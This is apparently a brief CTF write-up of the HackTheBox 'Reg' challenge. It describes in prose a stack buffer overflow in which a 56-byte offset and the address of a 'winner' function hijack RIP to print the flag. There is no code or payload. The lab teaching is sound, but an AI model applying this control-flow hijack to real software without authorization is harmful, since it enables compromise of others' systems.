We covered another example of a vulnerable binary to buffer overflow vulnerability. The binary has NX enabled to prevent code execution in the stack but our goal was to control the execution flow and redirect it to the “winner” function to print the flag. We generated a pattern to cause a segmentation fault then we used the address of the “winner” function so that the RIP register points to it after it hits the segmentation fault. This was part of HackTheBox Reg Intro to Binary Exploitation track.
We can take a look at the executable information, more notably we can see that it’s a 64-bit and it is not stripped which means that debugging information are not removed and the main function can be viewed easily. We will analyze this binary using Radare2. Our aim was to display the functions in the code and most importantly we wanted to focus on a function named winner().
This function prints the challenge flag only when a certain condition is met. We will want to redirect the execution flow of the code to call the winner() function. So instead of redirecting the execution of flow to point to return address (as usually in regular binary exploitation scenarios) instead, we’re going to redirect execution flow to reach the winner function and for that we need to trigger a segmentation fault first. Then we look for the address of the winner() function by displaying the list of functions in Radare2.
After hitting a segmentation fault, we take a look at the base pointer and the stack pointer and find the offset which eventually were found to be 56 then we’re going to generate only 56 bytes then we add the address of the winner function.